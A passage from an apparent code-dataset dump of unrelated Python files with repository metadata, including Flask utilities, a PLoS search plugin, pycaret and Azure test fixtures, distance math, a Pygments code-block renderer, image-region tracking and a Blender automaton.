if c.isnumeric() == True:
number_counter += 1
if number_counter > 3 :
result += '*'
else:
result += c
else:
number_counter = 0
result += c
#判断是否纯数字,如果是,后面需要rstrip('.0')
if type(text) != str :
return result.rstrip('.0')
else:
return result
else:
return text
| 6,372 |
xmasvideo/utils.py
|
torchbox/christmas-video-2017
| 2 |
2170138
|
from functools import wraps
import re
import shutil
import string
from flask import abort, current_app as app, request
_punct_re = re.compile(r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+')
def slugify(text, delim='-'):
"""Generates ASCII-only slug without digits."""
result = []
for word in _punct_re.split(text.lower()):
word = ''.join([i for i in word if i in string.ascii_lowercase])
if word:
result.append(word)
return str(delim.join(result))
def unslugify(text, delim='-'):
return text.replace(delim, ' ').title()
def cache_flush_password_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if not app.config['CACHE_FLUSH_PASSWORD']:
abort(403)
if request.form.get('password') != app.config['CACHE_FLUSH_PASSWORD']:
abort(403)
return f(*args, **kwargs)
return decorated_function
def flush_tmp_app_directories():
try:
shutil.rmtree(app.config['XMAS_OUTPUT_FOLDER'])
except FileNotFoundError:
pass
app.logger.info('Deleted %s and its contents',
app.config['XMAS_OUTPUT_FOLDER'])
try:
shutil.rmtree(app.config['XMAS_IMAGE_TXT_FILES_DIR'])
except FileNotFoundError:
pass
app.logger.info('Deleted %s and its contents',
app.config['XMAS_IMAGE_TXT_FILES_DIR'])
try:
shutil.rmtree(app.config['XMAS_VIDEOS_IMAGES_DIR'])
except FileNotFoundError:
pass
app.logger.info('Deleted %s and its contents',
app.config['XMAS_VIDEOS_IMAGES_DIR'])
def apply_acronyms_to_title(title):
acronyms_original = app.config['ACRONYMS']
acronyms_upper = [acronym.upper() for acronym in acronyms_original]
new_title = []
for title_part in title.split():
try:
index = acronyms_upper.index(title_part.upper())
new_title.append(acronyms_original[index])
except ValueError:
new_title.append(title_part)
return ' '.join(new_title)
| 2,045 |
user.py
|
IsSveshuD/lab_3
| 0 |
2169370
|
nameUser = input("Your name: ")
ageUser = input("Your age: ")
iveUser = input("Your live: ")
print("This is {0}. It is {1}. (S)he live in {2}" . format(nameUser, ageUser, iveUser))
| 180 |
plugins/metrics/PLoSsearch/Plugin.py
|
figshare/Total-Impact
| 5 |
2169871
|
#!/usr/bin/env python
import simplejson
import json
import urllib
import urllib2
import BeautifulSoup
from BeautifulSoup import BeautifulStoneSoup
import time
import re
import nose
from nose.tools import assert_equals
import sys
import os
import ConfigParser
# This hack is to add current path when running script from command line
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import BasePlugin
from BasePlugin.BasePlugin import BasePluginClass
from BasePlugin.BasePlugin import TestBasePluginClass
# Permissions: RWX for owner, WX for others. Set this here so that .pyc are created with these permissions
os.umask(022)
# Conforms to API specified here: https://github.com/mhahnel/Total-Impact/wiki/Plugin-requirements
# To do automated tests with nosy
# nosy CrossrefPlugin.py -A \'not skip\'
def skip(f):
f.skip = True
return f
class PluginClass(BasePluginClass):
# each plugin needs to customize this stuff
SOURCE_NAME = "PLoSsearch"
SOURCE_DESCRIPTION = "PLoS full text search."
SOURCE_URL = "http://www.plos.org/"
SOURCE_ICON = "http://a0.twimg.com/profile_images/67542107/Globe_normal.jpg"
SOURCE_METRICS = dict(mentions="the number of mentions in PLoS article full text")
PLOS_SEARCH_API_URL = ''
DEBUG = False
def __init__(self):
config = ConfigParser.ConfigParser()
config.readfp(open('../../../config/creds.ini'))
key = config.get('apis', 'PLoS_key')
self.PLOS_SEARCH_API_URL = 'http://api.plos.org/search?q="%s"&api_key=' + key
def get_page(self, id):
if not id:
return(None)
url = self.PLOS_SEARCH_API_URL % id
if (self.DEBUG):
print url
try:
page = self.get_cache_timeout_response(url)
if (self.DEBUG):
print page
except:
page = None
return(page)
def extract_stats(self, page, id):
if not page:
return(None)
(response_header, content) = page
soup = BeautifulStoneSoup(content)
#print soup.prettify()
try:
hits = soup.result['numfound']
except:
hits = 0
return({"mentions":hits})
def get_metric_values(self, id):
page = self.get_page(id)
if page:
response = self.extract_stats(page, id)
else:
response = {}
return(response)
def artifact_type_recognized(self, id):
if (self.is_pmid(id) or self.is_url(id) or self.is_mendeley_uuid(id)):
response = False
else:
response = True;
return(response)
def is_PDB_ID(self, id):
if re.search("[A-Za-z0-9]{4}", id):
return(True)
else:
return(False)
def is_Genbank_ID(self, id):
# to do
return(False)
def is_GEO_ID(self, id):
if re.search("G[A-Z{2}.\d+", id):
return(True)
else:
return(False)
def is_ArrayExpress_ID(self, id):
if re.search("E-[A-Za0-9\-]{4}", id):
return(True)
else:
return(False)
def build_artifact_response(self, artifact_id):
metrics_response = self.get_metric_values(artifact_id)
show_details_url = "http://www.plosone.org/search/advancedSearch.action?pageSize=10&journalOpt=all&unformattedQuery=everything%3A" + artifact_id
metrics_response.update({"show_details_url":show_details_url})
if (self.is_PDB_ID(artifact_id) or self.is_Genbank_ID(artifact_id) or self.is_GEO_ID(artifact_id) or self.is_ArrayExpress_ID(artifact_id)):
metrics_response.update({"type":"dataset"})
else:
metrics_response.update({"type":"unknown"})
return(metrics_response)
def get_artifacts_metrics(self, query):
response_dict = dict()
error = None
time_started = time.time()
for artifact_id in query:
## What other fields would we want to search for up, I wonder?
(artifact_id, lookup_id) = self.get_relevant_id(artifact_id, query[artifact_id], ["doi", "attacheddata"])
if (artifact_id):
artifact_response = self.build_artifact_response(lookup_id)
if artifact_response:
response_dict[artifact_id] = artifact_response
if (time.time() - time_started > self.MAX_ELAPSED_TIME):
error = "TIMEOUT"
break
return(response_dict, error)
class TestPluginClass(TestBasePluginClass):
def setup(self):
self.plugin = PluginClass()
self.test_parse_input = self.testinput.TEST_INPUT_DOI
## this changes for every plugin
def test_build_artifact_response(self):
response = self.plugin.build_artifact_response('10.1371/journal.pcbi.1000361')
assert_equals(response, {'doi': '10.1371/journal.pcbi.1000361', 'title': 'Adventures in Semantic Publishing: Exemplar Semantic Enhancements of a Research Article', 'url': 'http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1000361', 'journal': 'PLoS Comput Biol', 'authors': '<NAME>, Klyne, Miles', 'year': '2009', 'pmid': '19381256', 'type': 'article'})
## this changes for every plugin
def test_get_artifacts_metrics(self):
response = self.plugin.get_artifacts_metrics(self.test_parse_input)
assert_equals(response, ({u'10.1371/journal.pcbi.1000361': {'doi': u'10.1371/journal.pcbi.1000361', 'title': 'Adventures in Semantic Publishing: Exemplar Semantic Enhancements of a Research Article', 'url': 'http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1000361', 'journal': 'PLoS Comput Biol', 'authors': '<NAME>, <NAME>', 'year': '2009', 'pmid': '19381256', 'type': 'article'}}, 'NA'))
#each plugin should make sure its range of inputs are covered
def test_run_plugin_doi(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_DOI))
assert_equals(len(response), 1077)
def test_run_plugin_pmid(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_PMID))
assert_equals(len(response), 961)
def test_run_plugin_url(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_URL))
assert_equals(len(response), 685)
def test_run_plugin_invalid_id(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_DUD))
assert_equals(len(response), 685)
def test_run_plugin_multiple(self):
response = self.plugin.run_plugin(simplejson.dumps(self.testinput.TEST_INPUT_ALL))
assert_equals(len(response), 1710)
| 6,988 |
pycaret/tests/test_persistence.py
|
IncubatorShokuhou/pycaret
| 5,541 |
2167894
|
import os
import pytest
import boto3
from moto import mock_s3
from pycaret.internal.persistence import deploy_model
@pytest.fixture(scope='function')
def aws_credentials():
"""Mocked AWS Credentials for moto."""
os.environ['AWS_ACCESS_KEY_ID'] = 'testing'
os.environ['AWS_SECRET_ACCESS_KEY'] = 'testing'
os.environ['AWS_SECURITY_TOKEN'] = 'testing'
os.environ['AWS_SESSION_TOKEN'] = 'testing'
@pytest.fixture(scope='function')
def s3(aws_credentials):
"""Create a mock s3 for testing."""
with mock_s3():
yield boto3.client('s3', region_name='us-east-1')
def test_deploy_model(s3):
authentication = {'bucket': 'pycaret-test', 'path': 'test'}
s3.create_bucket(Bucket=authentication.get('bucket'))
model = 'test_model'
model_name = 'test'
deploy_model(model, model_name=model_name, platform='aws', authentication=authentication)
s3.head_object(Bucket=authentication.get("bucket"),
Key=os.path.join(authentication.get("path"), f"{model_name}.pkl"))
| 1,032 |
util/math/pairs.py
|
tchlux/util
| 4 |
2169401
|
import numpy as np
# This function maps an index in the range [0, count*(count - 1) // 2]
# to a tuple of integers in the range [0,count). The mapping will cover
# all pairs if you use all indices between [0, count*(count - 1) // 2].
def pair_to_index(p1, p2):
if (p1 < p2): p1, p2 = p2, p1
return (p1 * (p1 - 1) // 2) + p2
# This function maps an index in the range [0, count*(count - 1) // 2]
# to a tuple of integers in the range [0,count). The mapping will cover
# all pairs if you use all indices between [0, count*(count - 1) // 2].
def index_to_pair(index):
val = int(((1/4 + 2*index)**(1/2) + 1/2))
remainder = index - val*(val - 1)//2
return (val, remainder)
# Compute the number of original elements when given the number of pairs.
# This is done by realizing the following:
#
# n(n-1) / 2 = f(n)
# (n^2 - n) / 2 = f(n)
# n^2 - n = 2 f(n)
# n^2 - n + 1/4 = 2 f(n) + 1/4
# (n - 1/2)^2 = 2 f(n) + 1/4
# n - 1/2 = (2 f(n) + 1/4)^{1/2}
# n = (2 f(n) + 1/4)^{1/2} + 1/2
# 2n = (8 f(n) + 1)^{1/2} + 1
# n = ((8 f(n) + 1)^{1/2} + 1) / 2
#
def num_from_pairs(num_pairs):
return int(round( ((8*num_pairs + 1)**(1/2) + 1) / 2 ))
# Define a custom error for passing arrays of the wrong shape to pairwise.
class ShapeError(Exception): pass
# Compute the distance between all pairs of elements in a single list,
# or the distance of all combined pairs between two lists.
def pairwise_distance(x1, x2=None):
# Define an error for having the wrong array shape.
if (len(x1.shape) != 2): raise(ShapeError("Only 2D NumPy arrays are allowed."))
# Determine use case.
if (type(x2) == type(None)):
# Compute the pairwise distances.
x1_sq = np.sum(x1**2, axis=1, keepdims=True)
d = (x1_sq + x1_sq[:,0]) - 2 * np.matmul(x1, x1.T)
# Protect against the errors thta will occur along the diagonal.
d[np.diag_indices(len(d))] = 1.0
d[:,:] = np.sqrt(d[:,:])
d[np.diag_indices(len(d))] = 0.0
return d
else:
if (len(x2.shape) != 2): raise(ShapeError("Only 2D NumPy arrays are allowed."))
# Compute the pairwise distance between memebers of each set.
x1_sq = np.sum(x1**2, axis=1, keepdims=True)
x2_sq = np.sum(x2**2, axis=1)
return np.sqrt(x1_sq + x2_sq - 2 * np.matmul(x1, x2.T))
# ============================================================
# Test Cases
# ============================================================
def _test_pairwise_distance(display=False):
x = np.random.random((100,30))
y = np.random.random((10,30))
# Verify that the pairwise distance (between points in two sets) works.
dists = pairwise_distance(x, y)
for i in range(len(x)):
for j in range(len(y)):
truth = np.linalg.norm(x[i] - y[j])
assert(abs(dists[i,j] - truth) < 2**(-32))
# Verify that the pairwise distance (between points in one set) works.
dists = pairwise_distance(x)
for i in range(len(x)):
for j in range(i+1, len(x)):
ij = dists[i,j]
ji = dists[j,i]
truth = np.linalg.norm(x[i] - x[j])
assert(ij == ji)
assert(abs(ij - truth) < 2**(-32))
if display:
from scipy.spatial.distance import pdist, cdist
from util.system import Timer
x = np.random.random((500,4000))
y = np.random.random((5000,4000))
t = Timer()
d = pdist(x)
t.stop()
print("scipy ", d.shape, t.total)
t = Timer()
d = pairwise_distance(x)
t.stop()
print("mine ", d.shape, t.total)
t = Timer()
x2 = np.sum(x**2, axis=1, keepdims=True)
d = np.sqrt((x2 + x2[:,0]) - 2 * np.matmul(x, x.T))
t.stop()
print("numpy ", d.shape, t.total)
print()
t = Timer()
d = cdist(x,y)
t.stop()
print("scipy ", d.shape, t.total)
t = Timer()
d = pairwise_distance(x, y)
t.stop()
print("mine ", d.shape, t.total)
t = Timer()
x2 = np.sum(x**2, axis=1, keepdims=True)
y2 = np.sum(y**2, axis=1)
p = 2 * np.matmul(x, y.T)
d = np.sqrt(x2 + y2 - p)
t.stop()
print("numpy ", d.shape, t.total)
if __name__ == "__main__":
_test_pairwise_distance()
| 4,436 |
plugins.py
|
yobin/saepy-log
| 3 |
2167190
|
# -*- coding: utf-8 -*-
import re
from pygments import highlight
from pygments import lexers
from pygments import formatters
###### def
def pygmentize(code_raw, language):
lexer = lexers.get_lexer_by_name(language, encoding='utf-8', startinline=True)
return highlight(code_raw, lexer, formatters.HtmlFormatter(encoding="utf-8",startinline=True))
def tableize_code (text, lang = ""):
string = text.strip()
table = ['<div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers">']
code = []
index = 0
for line in string.split("\n"):
table.append("<span class='line-number'>%d</span>\n" % (index+1))
code.append("<span class='line'>%s</span>" % line)
index += 1
table.append("</pre></td><td class='code'><pre><code class='%s'>%s</code></pre></td></tr></table></div>" % (lang, "\n".join(code)))
return "".join(table)
def strip_hl_div(text):
__HL_RE = re.compile('<div class="highlight"><pre>(.+?)</pre></div>', re.UNICODE|re.I|re.M|re.S)
m = __HL_RE.match(text)
if m:
return text.replace(m.group(0), m.group(1))
return text
####### code block #####
def code_block(text):
"""
Syntax
{% codeblock [title] [lang:language] [url] [link text] %}
code snippet
{% endcodeblock %}
"""
__CODE_BLOCK_RE = re.compile(r"""\s({% codeblock ([^%\[\]]*)%}(.+?){% endcodeblock %})""",re.I|re.M|re.S)
__CaptionUrlTitle = re.compile('(\S[\S\s]*)\s+(https?:\/\/\S+|\/\S+)\s*(.+)?', re.UNICODE|re.I|re.M|re.S)
__Caption = re.compile('(\S[\S\s]*)', re.UNICODE|re.I|re.M|re.S)
__Lang = re.compile('\s*lang:(\S+)', re.UNICODE|re.I|re.M|re.S)
codes = __CODE_BLOCK_RE.findall(text)
for code in codes:
caption = ""
filetype = ""
fileurl = ""
code_block_str = code[0]
code_info = code[1]
code_raw = code[2]
if code_info:
m = __Lang.search(code_info)
if m:
filetype = m.group(1)
code_info = __Lang.sub("", code_info)
m = __CaptionUrlTitle.match(code_info)
if m:
filename = m.group(1)
caption = "<figcaption><span>%s</span><a href='%s' target='_blank' rel='nofollow'>%s</a></figcaption>\n" % (m.group(1), m.group(2), m.group(3))
else:
m2 = __Caption.match(code_info)
if m2:
filename = m2.group(1)
caption = "<figcaption><span>%s</span></figcaption>\n" % m2.group(1)
else:
filename = ""
caption = ""
if not filetype and filename:
m = re.search(r"\S[\S\s]*\w+\.(\w+)", filename)
if m:
filetype = m.group(1)
#
source = ["<figure class='code'>"]
if caption:
source.append(caption)
if filetype:
try:
hltext = pygmentize(code_raw, filetype)
tmp_text = tableize_code (strip_hl_div(hltext), filetype)
except:
tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))
else:
tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))
source.append(tmp_text)
source.append("</figure>")
#print "\n".join(source)
text = text.replace(code_block_str, "\n".join(source))
return text
### Backtick Code Blocks ###
def backtick_code_block(text):
"""
Syntax
``` [language] [title] [url] [link text]
code snippet
```
"""
__CODE_BLOCK_RE = re.compile(r"""\s(^`{3} *([^\n]+)?\n(.+?)\n`{3})""",re.I|re.M|re.S)
__AllOptions = re.compile('([^\s]+)\s+(.+?)\s+(https?:\/\/\S+|\/\S+)\s*(.+)?', re.UNICODE|re.I|re.M|re.S)
__LangCaption = re.compile('([^\s]+)\s*(.+)?', re.UNICODE|re.I|re.M|re.S)
codes = __CODE_BLOCK_RE.findall(text)
for code in codes:
options = ""
caption = ""
lang = ""
fileurl = ""
code_block_str = code[0]
code_info = code[1]
code_raw = code[2]
if code_info:
m = __AllOptions.match(code_info)
if m:
lang = m.group(1)
caption = "<figcaption><span>%s</span><a href='%s' target='_blank' rel='nofollow'>%s</a></figcaption>" % (m.group(2), m.group(3), m.group(4))
else:
m2 = __LangCaption.match(code_info)
if m2:
lang = m2.group(1)
caption = "<figcaption><span>%s</span></figcaption>" % m2.group(2)
if re.match('\A( {4}|\t)', code_raw):
code_raw = re.sub('^( {4}|\t)', '', code_raw)
#
source = ["<figure class='code'>"]
if caption:
source.append(caption)
if not lang or lang == 'plain':
tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))
else:
try:
hltext = pygmentize(code_raw, lang)
tmp_text = tableize_code (strip_hl_div(hltext), lang)
except:
tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))
source.append(tmp_text)
source.append("</figure>")
text = text.replace(code_block_str, "\n".join(source))
return text
### VideoTag ###
def videotag(text):
"""
Syntax
{% video url/to/video [width height] [url/to/poster] %}
"""
__VIDEOTAG_RE = re.compile(r"""\s({% video (https?:\S+)(\s+(https?:\S+))?(\s+(https?:\S+))?(\s+(\d+)\s(\d+))?(\s+(https?:\S+))? %})""",re.I|re.M|re.S)
codes = __VIDEOTAG_RE.findall(text)
vtype = {
'mp4': "type='video/mp4; codecs=\"avc1.42E01E, mp4a.40.2\"'",
'ogv': "type='video/ogg; codecs=theora, vorbis'",
'webm': "type='video/webm; codecs=vp8, vorbis'"
}
for code in codes:
video = code[1]
width = int(code[7])
height = int(code[8])
poster = code[10]
if video and width > 0 and height > 0:
video_code = []
video_code.append("<video width='%d' height='%d' preload='none' controls poster='%s'>" % (width, height, poster))
t = video.split(".")[-1]
video_code.append("<source src='%s' %s>" % (video, vtype[t]))
video_code.append("</video>")
text = text.replace(code[0], "".join(video_code))
return text
###########
def parse_text(text):
#text = code_block(text)
text = videotag(text)
text = backtick_code_block(text)
return text
| 6,619 |
py/projects/functional_web_tests/tests/pages/ynet_home.py
|
qaviton/test_repository
| 7 |
2170103
|
from tests.pages.components.page import Page
from tests.parameters.locators import locator
class YnetHomePage(Page):
def c3_Hor(self):
return self.find_all(locator.c3_Hor)
def evritiframe_1(self):
return self.find_all(locator.evritiframe_1)
def multiarticles_15(self):
return self.find_all(locator.multiarticles_15)
def multiarticles_5(self):
return self.find_all(locator.multiarticles_5)
def close_console(self):
return self.find_all(locator.close_console)
def su_iframe(self):
return self.find_all(locator.su_iframe)
def xButtn(self):
return self.find_all(locator.xButtn)
def console_resize(self):
return self.find_all(locator.console_resize)
def first_title(self):
return self.find_all(locator.first_title)
def arrows(self):
return self.find_all(locator.arrows)
def mainSearchSelectText(self):
return self.find_all(locator.mainSearchSelectText)
def teaserxnet_1(self):
return self.find_all(locator.teaserxnet_1)
def iframe_container(self):
return self.find_all(locator.iframe_container)
def null(self):
return self.find_all(locator.null)
def ads_300x250_4(self):
return self.find_all(locator.ads_300x250_4)
| 1,310 |
sdk/communication/azure-communication-identity/tests/_shared/testcase.py
|
nittaya1990/azure-sdk-for-python
| 2 |
2169619
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import re
import os
from devtools_testutils import AzureTestCase
from azure_devtools.scenario_tests import RecordingProcessor, ReplayableTest
from azure_devtools.scenario_tests.utilities import is_text_payload
from azure.communication.identity._shared.utils import parse_connection_str
from _shared.utils import generate_teams_user_aad_token
class ResponseReplacerProcessor(RecordingProcessor):
def __init__(self, keys=None, replacement="sanitized"):
self._keys = keys if keys else []
self._replacement = replacement
def process_response(self, response):
def sanitize_dict(dictionary):
for key in dictionary:
value = dictionary[key]
if isinstance(value, str):
dictionary[key] = re.sub(
r"("+'|'.join(self._keys)+r")",
self._replacement,
dictionary[key])
elif isinstance(value, dict):
sanitize_dict(value)
sanitize_dict(response)
return response
class BodyReplacerProcessor(RecordingProcessor):
"""Sanitize the sensitive info inside request or response bodies"""
def __init__(self, keys=None, replacement="sanitized"):
self._replacement = replacement
self._keys = keys if keys else []
def process_request(self, request):
if is_text_payload(request) and request.body:
request.body = self._replace_keys(request.body.decode()).encode()
return request
def process_response(self, response):
if is_text_payload(response) and response['body']['string']:
response['body']['string'] = self._replace_keys(response['body']['string'])
return response
def _replace_keys(self, body):
def _replace_recursively(dictionary):
for key in dictionary:
value = dictionary[key]
if key in self._keys:
dictionary[key] = self._replacement
elif isinstance(value, dict):
_replace_recursively(value)
import json
try:
body = json.loads(body)
_replace_recursively(body)
except (KeyError, ValueError):
return body
return json.dumps(body)
class CommunicationTestCase(AzureTestCase):
FILTER_HEADERS = ReplayableTest.FILTER_HEADERS + ['x-azure-ref', 'x-ms-content-sha256', 'location']
def __init__(self, method_name, *args, **kwargs):
super(CommunicationTestCase, self).__init__(method_name, *args, **kwargs)
def setUp(self):
super(CommunicationTestCase, self).setUp()
if self.is_playback():
self.connection_str = "endpoint=https://sanitized/;accesskey=fake==="
self.m365_app_id = "sanitized"
self.m365_aad_authority = "sanitized"
self.m365_aad_tenant = "sanitized"
self.m365_scope = "sanitized"
self.msal_username = "sanitized"
self.msal_password = "<PASSWORD>"
self.expired_teams_token = "<PASSWORD>"
self.skip_get_token_for_teams_user_tests = "false"
else:
self.connection_str = os.getenv('COMMUNICATION_LIVETEST_DYNAMIC_CONNECTION_STRING')
self.m365_app_id = os.getenv('COMMUNICATION_M365_APP_ID')
self.m365_aad_authority = os.getenv('COMMUNICATION_M365_AAD_AUTHORITY')
self.m365_aad_tenant = os.getenv('COMMUNICATION_M365_AAD_TENANT')
self.m365_scope = os.getenv('COMMUNICATION_M365_SCOPE')
self.msal_username = os.getenv('COMMUNICATION_MSAL_USERNAME')
self.msal_password = os.getenv('COMMUNICATION_MSAL_PASSWORD')
self.expired_teams_token = os.getenv('COMMUNICATION_EXPIRED_TEAMS_TOKEN')
endpoint, _ = parse_connection_str(self.connection_str)
self._resource_name = endpoint.split(".")[0]
self.scrubber.register_name_pair(self._resource_name, "sanitized")
self.skip_get_token_for_teams_user_tests = os.getenv('SKIP_INT_IDENTITY_EXCHANGE_TOKEN_TEST')
def generate_teams_user_aad_token(self):
if self.is_playback():
teams_user_aad_token = "sanit<PASSWORD>"
else:
teams_user_aad_token = generate_teams_user_aad_token(m365_app_id=self.m365_app_id, m365_aad_authority=self.m365_aad_authority, m365_aad_tenant=self.m365_aad_tenant, msal_username=self.msal_username, msal_password=<PASSWORD>, m365_scope=self.m365_scope)
return teams_user_aad_token
def skip_get_token_for_teams_user_test(self):
return str(self.skip_get_token_for_teams_user_tests).lower() == 'true'
| 5,018 |
stack/stack.py
|
pcordemans/algorithms_examples
| 0 |
2170169
|
from sllist import SingleLinkedList
class Stack:
def __init__(self):
self.__list = SingleLinkedList()
def top(self):
return self.__list.head()
def push(self, element):
self.__list.prepend(element)
def pop(self):
element = self.top()
self.__list = self.__list.tail()
return element
def isEmpty(self):
return self.__list.isEmpty()
| 409 |
stress/test_bigindex.py
|
soad241/whoosh
| 2 |
2169072
|
import unittest
import os.path, random
from shutil import rmtree
from whoosh import fields, index
from whoosh.filedb.filestore import FileStorage
class Test(unittest.TestCase):
def make_index(self, dirname, schema, ixname):
if not os.path.exists(dirname):
os.mkdir(dirname)
st = FileStorage(dirname)
ix = st.create_index(schema, indexname = ixname)
return ix
def destroy_index(self, dirname):
if os.path.exists(dirname):
try:
rmtree(dirname)
except OSError, e:
pass
def test_20000_small_files(self):
sc = fields.Schema(id=fields.ID(stored=True), text=fields.TEXT)
ix = self.make_index("testindex", sc, "ix20000")
domain = ["alfa", "bravo", "charlie", "delta", "echo", "foxtrot",
"golf", "hotel", "india", "juliet", "kilo", "lima"]
for i in xrange(20000):
print i
w = ix.writer()
w.add_document(id=unicode(i),
text = u"".join(random.sample(domain, 5)))
w.commit()
ix.optimize()
ix.close()
self.destroy_index("testindex")
if __name__ == "__main__":
unittest.main()
| 1,299 |
src/hirails_hrfi/tracker/tracker.py
|
JPLMLIA/OWLS-Autonomy
| 5 |
2167321
|
'''
HRFI target detection.
Calling it tracker for self-consistency with other modules,
however time is not currently factored into tracking
'''
import json
import os
import logging
import numpy as np
from skimage.filters import threshold_otsu
from skimage.segmentation import clear_border
from skimage.measure import label, regionprops
from skimage.morphology import closing, square
from utils.file_manipulation import tiff_read
def hrfi_tracker(hrfi_filepath, experiment, config):
rgb = tiff_read(hrfi_filepath)
# Verify band weights in config
sum_band_w = np.round(config["instrument"]["red_band_weight"] + \
config["instrument"]["green_band_weight"] + \
config["instrument"]["blue_band_weight"], 3)
if sum_band_w != 1.0:
logging.warning(f"Instrument band weights don't sum to 1 ({sum_band_w}), normalizing.")
config["instrument"]['red_band_weight'] /= sum_band_w
config["instrument"]['green_band_weight'] /= sum_band_w
config["instrument"]['blue_band_weight'] /= sum_band_w
# Reduce 3 banded image to 1, with band weights being set by detector calibration
gray = ((config["instrument"]["red_band_weight"] * rgb[:,:,0]) +
(config["instrument"]["green_band_weight"] * rgb[:,:,1]) +
(config["instrument"]["blue_band_weight"] * rgb[:,:,2]))
# Scale data 0 to 1
gray = np.clip(gray, 0, config["instrument"]["max_dn"])
gray = gray / config["instrument"]["max_dn"]
# Determine threshold
t1 = threshold_otsu(gray)
t2 = np.percentile(gray, config["instrument"]["min_perc"])
t = max(t1, t2)
# Determine connected regions of whitespace and mark them as potential critters
image = np.zeros((rgb.shape[0],rgb.shape[1]))
image[gray > t] = 1
bw = closing(image==1, square(3))
cleared = clear_border(bw)
label_image = label(cleared)
# Filter to only save organisms larger than min_organism_size pixels
bboxes = []
[bboxes.append(region.bbox) for region in regionprops(label_image) if region.area >= config["tracker"]["min_bbox_area"] and region.area <= config["tracker"]["max_bbox_area"]]
track_folder = os.path.join(experiment, config['experiment_dirs']['track_dir'])
if not os.path.exists(track_folder):
os.makedirs(track_folder)
file_tag = hrfi_filepath.split("/")[-1].split(".")[0]
with open(os.path.join(track_folder, f"{file_tag}_bboxes.json"), 'w') as f:
json.dump(bboxes, f, indent=2)
| 2,564 |
Assignments/Lists Basics/Lab/03. Lists Statistics.py
|
KaloyankerR/python-fundamentals-repository
| 0 |
2170067
|
n = int(input())
positives = []
negatives = []
for i in range(n):
number = int(input())
if number >= 0:
positives.append(number)
else:
negatives.append(number)
print(positives)
print(negatives)
print(f'Count of positives: {len(positives)}. Sum of negatives: {sum(negatives)}')
| 308 |
huxley/core/migrations/0027_committee_feedback.py
|
srisainachuri/huxley
| 18 |
2169761
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-11-05 16:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [('core', '0026_auto_20171206_1716'), ]
operations = [
migrations.CreateModel(
name='CommitteeFeedback',
fields=[
('id', models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID')),
('comment', models.TextField()),
('committee', models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to='core.Committee')),
],
options={
'db_table': 'committee_feedback',
}, ),
migrations.AddField(
model_name='delegate',
name='committee_feedback_submitted',
field=models.BooleanField(default=False), ),
migrations.AlterField(
model_name='registration',
name='committee_preferences',
field=models.ManyToManyField(
blank=True, null=True, to='core.Committee'), ),
]
| 1,301 |
Server/Python/tests/dbsserver_t/unittests/dao_t/Oracle_t/FileLumi_t/List_t.py
|
vkuznet/DBS
| 8 |
2170038
|
"""
dao unittests
"""
import os
import unittest
import logging
import copy
from dbsserver_t.utils.DaoConfig import DaoConfig
from dbsserver_t.utils.DBSDataProvider import create_dbs_data_provider, strip_volatile_fields
from dbs.dao.Oracle.FileLumi.List import List as FileLumiList
from types import GeneratorType
class List_t(unittest.TestCase):
@DaoConfig("DBSReader")
def __init__(self, methodName='runTest'):
super(List_t, self).__init__(methodName)
data_location = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test_data.pkl')
self.data_provider = create_dbs_data_provider(data_type='transient', data_location=data_location)
self.lumi_data = self.data_provider.get_file_lumi_data()
#needs to be regenerated, since it was not used in Insert_t
self.block_data = self.data_provider.get_block_data(regenerate=True)
def setUp(self):
"""setup all necessary parameters"""
self.conn = self.dbi.connection()
self.dao = FileLumiList(self.logger, self.dbi, self.dbowner)
#List API returns a list of lumi sections, whereas the Insert API needs a single lumi_section_number per file
#IMHO that should be fixed
for entry in self.lumi_data:
if 'lumi_section_num' in entry:
entry['lumi_section_num'] = [entry['lumi_section_num']]
def tearDown(self):
"""Clean-up all necessary parameters"""
self.conn.close()
def test01(self):
"""dao.Oracle.FileLumi.List: Basic"""
result = self.dao.execute(self.conn, logical_file_name=self.lumi_data[0]['logical_file_name'])
self.assertTrue(type(result) == GeneratorType)
l = []
for i in result:
l.append(i)
self.assertEqual(strip_volatile_fields(l), self.lumi_data)
def test02(self):
"""dao.Oracle.FileLumi.List: Basic"""
result = self.dao.execute(self.conn, block_name=self.block_data[0]['block_name'])
self.assertTrue(type(result) == GeneratorType)
l =[]
for i in result:
l.append(i)
self.assertEqual(strip_volatile_fields(l), self.lumi_data)
if __name__ == "__main__":
SUITE = unittest.TestLoader().loadTestsFromTestCase(List_t)
unittest.TextTestRunner(verbosity=2).run(SUITE)
| 2,327 |
cellular automata/blender-scripting/automata_blender.py
|
ChrizH/data-science-learning
| 1 |
2168149
|
import bpy
import bmesh
from mathutils import Vector
import numpy as np
# Blender import system clutter
import sys
from pathlib import Path
UTILS_PATH = Path.home() / "Documents/python_workspace/data-science-learning"
sys.path.append(str(UTILS_PATH))
import utils.blender_utils
import importlib
importlib.reload(utils.blender_utils)
from utils.blender_utils import init_greasy_pencil
class Automaton_1D:
def __init__(self, n: int, states: int = 2):
"""
1D Automaton
:param n: number of cells
"""
self.n = n
self.space = np.zeros(n, dtype=np.uint8)
self.space[n // 2] = 1
# np.array([0,0,0,0,1,0,0,0,0,0])#np.random.choice(2, n)
def update(self, rule: dict):
"""
Update automaton state
"""
tmp_space = self.space.copy()
